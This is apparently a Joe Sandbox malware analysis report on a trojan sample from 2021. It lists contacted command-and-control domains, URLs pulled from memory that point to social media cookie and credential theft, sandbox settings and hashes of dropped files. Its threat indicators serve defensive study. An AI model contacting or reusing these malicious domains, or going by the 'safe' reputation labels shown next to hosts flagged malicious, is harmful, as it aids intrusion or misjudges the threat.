https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js	0%	Avira URL Cloud	safe
https://twitter.comsec-fetch-dest:	0%	Avira URL Cloud	safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z	0%	Avira URL Cloud	safe
http://C431A802FF4A46B5.com//L	0%	Avira URL Cloud	safe
http://C431A802FF4A46B5.com/info_old/ddd	0%	Avira URL Cloud	safe
http://C431A802FF4A46B5.com/p	0%	Avira URL Cloud	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://back19e64ea00d6ecfe1.io/	0%	Avira URL Cloud	safe
http://back19e64ea00d6ecfe1.io/7	0%	Avira URL Cloud	safe
http://back19e64ea00d6ecfe1.io/6	0%	Avira URL Cloud	safe
http://84B5A35D6E5335EF.com/info_old/ddd	0%	Avira URL Cloud	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	0%	URL Reputation	safe
http://55be681fc6760236.com/	0%	Avira URL Cloud	safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ1Y2M3ZjUxNTk0ZjI1ZWI5NjQxNjllMjcxMDliYzA5MWY4N	0%	Avira URL Cloud	safe
http://61D53B5A4BC1AB86.com/	0%	Avira URL Cloud	safe
http://www.vb-cable.comVBCABLE	0%	Avira URL Cloud	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
https://670D67B00237B933.xyz/	0%	Avira URL Cloud	safe
http://84b2feea30c3cc5d.com/	0%	Avira URL Cloud	safe
https://support.goog	0%	Avira URL Cloud	safe
http://61D53B5A4BC1AB86.com/info_old/w	0%	Avira URL Cloud	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1	0%	Avira URL Cloud	safe
https://670D67B00237B933.xyz/T	0%	Avira URL Cloud	safe
http://55BE681FC6760236.com/info_old/ddd	0%	Avira URL Cloud	safe
http://9ede681fc6760236.com/	0%	Avira URL Cloud	safe
http://BDC347C728B2D94D.com/o/	0%	Avira URL Cloud	safe
http://back19e64ea00d6ecfe1.io/h	0%	Avira URL Cloud	safe
http://www.vb-cable.com	0%	Avira URL Cloud	safe
http://BDC347C728B2D94D.com/info_old/dddn	0%	Avira URL Cloud	safe
http://BDC347C728B2D94D.com/info_old/w	0%	Avira URL Cloud	safe
http://back19e64ea00d6ecfe1.io/info_old/wJ	0%	Avira URL Cloud	safe
http://back19e64ea00d6ecfe1.io/info_old/ddd	0%	Avira URL Cloud	safe
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js	0%	Avira URL Cloud	safe
http://C431A802FF4A46B5.com//	0%	Avira URL Cloud	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://pki.goog/gsr2/GTSGIAG3.crt0)	0%	URL Reputation	safe
http://pki.goog/gsr2/GTSGIAG3.crt0)	0%	URL Reputation	safe
http://pki.goog/gsr2/GTSGIAG3.crt0)	0%	URL Reputation	safe
http://back19e64ea00d6ecfe1.io/info_old/ddd.	0%	Avira URL Cloud	safe
https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bdc347c728b2d94d.com	unknown	unknown	true	unknown
84b5a35d6e5335ef.com	unknown	unknown	true	unknown
61D53B5A4BC1AB86.com	unknown	unknown	true	unknown
C431A802FF4A46B5.com	unknown	unknown	true	unknown
9ED2FEEA30C3CC5D.com	unknown	unknown	true	unknown
61d53b5a4bc1ab86.com	unknown	unknown	true	unknown
9ed2feea30c3cc5d.com	unknown	unknown	true	unknown
back19e64ea00d6ecfe1.io	unknown	unknown	true	unknown
55BE681FC6760236.com	unknown	unknown	true	unknown
BDC347C728B2D94D.com	unknown	unknown	true	unknown
84B5A35D6E5335EF.com	unknown	unknown	true	unknown
55be681fc6760236.com	unknown	unknown	true	unknown
c431a802ff4a46b5.com	unknown	unknown	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://61d347c728b2d94d.com/	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.368374253.0000000000800000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate	ecv743B.tmp.11.dr	false		high
https://duckduckgo.com/chrome_newtab	Localwebdata1618257874860.6.dr	false		high
http://55BE681FC6760236.com/o/	26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://BDC347C728B2D94D.com/_1;	26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	Localwebdata1618257874860.6.dr	false		high
https://www.messenger.com/	26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
http://84b5a35d6e5335ef.com/info_old/w	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.349232484.00000000007C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://back19e64ea00d6ecfe1.io/C	26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com	ecv743B.tmp.11.dr	false		high
http://9ED2FEEA30C3CC5D.com/info_old/ddd9	26FF190E7AE0F7C7.exe, 00000006.00000003.421266635.00000000038C8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://back19e64ea00d6ecfe1.io/Y	26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nirsoft.net	1618257864703.exe, 0000000B.00000002.385423543.0000000000198000.00000004.00000010.sdmp	false		high
https://deff.nelreports.net/api/report?cat=msn	ecv743B.tmp.11.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://BDC347C728B2D94D.com/w	26FF190E7AE0F7C7.exe, 00000007.00000002.383823550.00000000007A3000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://back19e64ea00d6ecfe1.io/info_old/w	26FF190E7AE0F7C7.exe, 00000006.00000003.422250133.00000000038C8000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.383749465.0000000000779000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://61D53B5A4BC1AB86.com/ll	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.348685035.00000000007C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://61D53B5A4BC1AB86.com/info_old/ddd	26FF190E7AE0F7C7.exe, 00000006.00000003.421765366.00000000038C8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/__media__/js/util/nrrV9140.js	ecv743B.tmp.11.dr	false		high
https://twitter.com/ookie:	26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
http://55BE681FC6760236.com/o/H	26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://BDC347C728B2D94D.com/	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.349232484.00000000007C1000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000003.381165044.00000000007A7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js	ecv743B.tmp.11.dr	false	Avira URL Cloud: safe	unknown
https://twitter.comsec-fetch-dest:	26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z	ecv743B.tmp.11.dr	false	Avira URL Cloud: safe	unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f	ecv743B.tmp.11.dr	false		high
http://charlesproxy.com/ssl	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.349991546.0000000000807000.00000004.00000001.sdmp	false		high
http://C431A802FF4A46B5.com//L	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.348685035.00000000007C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/?ocid=iehp	ecv743B.tmp.11.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3	ecv743B.tmp.11.dr	false		high
http://C431A802FF4A46B5.com/info_old/ddd	26FF190E7AE0F7C7.exe, 00000006.00000003.422250133.00000000038C8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://C431A802FF4A46B5.com/p	26FF190E7AE0F7C7.exe, 00000007.00000002.383823550.00000000007A3000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pki.goog/GTS1O1core.crl0	ecv743B.tmp.11.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://back19e64ea00d6ecfe1.io/	26FF190E7AE0F7C7.exe, 00000007.00000002.383823550.00000000007A3000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://www.messenger.com	26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
https://cvision.media.net/new/300x300/2/189/9/46/83cfba42-7d45-4670-a4a7-a3211ca07534.jpg?v=9	ecv743B.tmp.11.dr	false		high
http://back19e64ea00d6ecfe1.io/7	26FF190E7AE0F7C7.exe, 00000007.00000003.381165044.00000000007A7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nirsoft.net/	1618257864703.exe, 1618257864703.exe.6.dr	false		high
http://back19e64ea00d6ecfe1.io/6	26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://84B5A35D6E5335EF.com/info_old/ddd	26FF190E7AE0F7C7.exe, 00000006.00000003.422250133.00000000038C8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	ecv743B.tmp.11.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://55be681fc6760236.com/	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.348685035.00000000007C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2	26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ1Y2M3ZjUxNTk0ZjI1ZWI5NjQxNjllMjcxMDliYzA5MWY4N	ecv743B.tmp.11.dr	false	Avira URL Cloud: safe	unknown
https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=	26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
https://www.instagram.com/	26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	download_user.dll.6.dr	false		high
http://www.xunlei.com/GET	download_user.dll.6.dr	false		high
http://61D53B5A4BC1AB86.com/	26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.383823550.00000000007A3000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee	ecv743B.tmp.11.dr	false		high
http://www.vb-cable.comVBCABLE	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	false	Avira URL Cloud: safe	unknown
https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c	ecv743B.tmp.11.dr	false		high
https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me	26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
https://www.messenger.com/origin:	26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Localwebdata1618257874860.6.dr	false		high
http://pki.goog/gsr2/GTS1O1.crt0	ecv743B.tmp.11.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://670D67B00237B933.xyz/	26FF190E7AE0F7C7.exe, 00000006.00000003.422250133.00000000038C8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	ecv743B.tmp.11.dr	false		high
https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml	ecv743B.tmp.11.dr	false		high
http://84b2feea30c3cc5d.com/	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.357948935.00000000007F2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://support.goog	26FF190E7AE0F7C7.exe, 00000006.00000003.422617466.0000000003E82000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://61D53B5A4BC1AB86.com/info_old/w	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.368315810.000000000079A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g	ecv743B.tmp.11.dr	false		high
https://contextual.media.net/	ecv743B.tmp.11.dr	false		high
https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie	ecv743B.tmp.11.dr	false		high
https://pki.goog/repository/0	ecv743B.tmp.11.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1	ecv743B.tmp.11.dr	false	Avira URL Cloud: safe	unknown
https://670D67B00237B933.xyz/T	26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://55BE681FC6760236.com/info_old/ddd	26FF190E7AE0F7C7.exe, 00000006.00000003.422250133.00000000038C8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.twitter.com/1.1/statuses/update.json	26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
https://srtb.msn.com/auction?a=de-ch&b=fa1a6a09db4c4f6fbf480b78c51caf60&c=MSN&d=http%3A%2F%2Fwww.msn	ecv743B.tmp.11.dr	false		high
http://9ede681fc6760236.com/	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.350410684.00000000007F2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736	ecv743B.tmp.11.dr	false		high
https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9	ecv743B.tmp.11.dr	false		high
http://www.msn.com/	ecv743B.tmp.11.dr	false		high
https://upload.twitter.com/i/media/upload.json	26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
http://BDC347C728B2D94D.com/o/	26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734	ecv743B.tmp.11.dr	false		high
https://twitter.com/compose/tweetsec-fetch-mode:	26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
http://55BE681FC6760236.com/	26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	false		unknown
http://back19e64ea00d6ecfe1.io/h	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.349697367.00000000007CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vb-cable.com	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	false	Avira URL Cloud: safe	unknown
http://BDC347C728B2D94D.com/info_old/dddn	26FF190E7AE0F7C7.exe, 00000006.00000003.422415280.00000000038C8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://BDC347C728B2D94D.com/info_old/w	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.368315810.000000000079A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://www.messenger.com/accept:	26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
http://back19e64ea00d6ecfe1.io/info_old/wJ	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.368315810.000000000079A000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://back19e64ea00d6ecfe1.io/info_old/ddd	26FF190E7AE0F7C7.exe, 00000006.00000003.422586817.00000000038C8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804	ecv743B.tmp.11.dr	false		high
https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3	ecv743B.tmp.11.dr	false		high
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js	ecv743B.tmp.11.dr	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/48/nrrV18753.js	ecv743B.tmp.11.dr	false		high
http://C431A802FF4A46B5.com//	SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000003.348685035.00000000007C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://cvision.media.net/new/286x175/2/189/134/171/257b11a9-f3a3-4bb3-9298-c791f456f3d0.jpg?v=9	ecv743B.tmp.11.dr	false		high
http://back19e64ea00d6ecfe1.io/y	26FF190E7AE0F7C7.exe, 00000007.00000003.381285815.00000000007A3000.00000004.00000001.sdmp	false		unknown
http://crl.pki.goog/gsr2/gsr2.crl0?	ecv743B.tmp.11.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pki.goog/gsr2/GTSGIAG3.crt0)	ecv743B.tmp.11.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0	26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false		high
http://back19e64ea00d6ecfe1.io/info_old/ddd.	26FF190E7AE0F7C7.exe, 00000006.00000003.422586817.00000000038C8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://feedback.googleusercontent.com	26FF190E7AE0F7C7.exe, 00000007.00000003.379486057.0000000003ED9000.00000004.00000001.sdmp	false		high
https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:	26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	385405
Start date:	12.04.2021
Start time:	13:02:11
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Trojan.Siggen12.33370.30028.25368 (renamed file extension from 25368 to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal93.bank.troj.spyw.evad.winEXE@32/37@98/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 58.2% (good quality ratio 55.2%) Quality average: 80.4% Quality standard deviation: 27.4%
HCA Information:	Successful, ratio: 68% Number of executed functions: 117 Number of non-executed functions: 225
Cookbook Comments:	Adjust boot time Enable AMSI Stop behavior analysis, all processes terminated
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 104.42.151.234, 204.79.197.200, 13.107.21.200, 104.43.139.144, 52.147.198.201, 92.122.145.220, 205.185.216.42, 205.185.216.10, 13.64.90.137, 20.82.210.154, 92.122.213.247, 92.122.213.194 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, 2-01-3cf7-0009.cdx.cedexis.net, store-images.s-microsoft.com-c.edgekey.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, download.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, skypedataprdcoleus16.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:03:11	API Interceptor	16x Sleep call for process: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe modified
13:03:24	API Interceptor	13x Sleep call for process: 26FF190E7AE0F7C7.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	IpB8f8qwze.exe	Get hash	malicious	Browse
	IpB8f8qwze.exe	Get hash	malicious	Browse
	Setup.exe	Get hash	malicious	Browse
	Setup.exe	Get hash	malicious	Browse
	tyxCV1ouryr7.exe	Get hash	malicious	Browse
	aOn5CfTiwS.exe	Get hash	malicious	Browse
	fnhcdXEfus.exe	Get hash	malicious	Browse
	fnhcdXEfus.exe	Get hash	malicious	Browse
	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\MSI429C.tmp	IpB8f8qwze.exe	Get hash	malicious	Browse
	IpB8f8qwze.exe	Get hash	malicious	Browse
	Setup.exe	Get hash	malicious	Browse
	Setup.exe	Get hash	malicious	Browse
	tyxCV1ouryr7.exe	Get hash	malicious	Browse
	fnhcdXEfus.exe	Get hash	malicious	Browse
	6MhmlD8KZh.exe	Get hash	malicious	Browse
	fnhcdXEfus.exe	Get hash	malicious	Browse
	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Cookies1618257864625 Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6951152985249047
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
MD5:	EA7F9615D77815B5FFF7C15179C6C560
SHA1:	3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
SHA-256:	A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
SHA-512:	9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Cookies1618257873906 Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6951152985249047
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
MD5:	EA7F9615D77815B5FFF7C15179C6C560
SHA1:	3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
SHA-256:	A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
SHA-512:	9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\background.js Download File
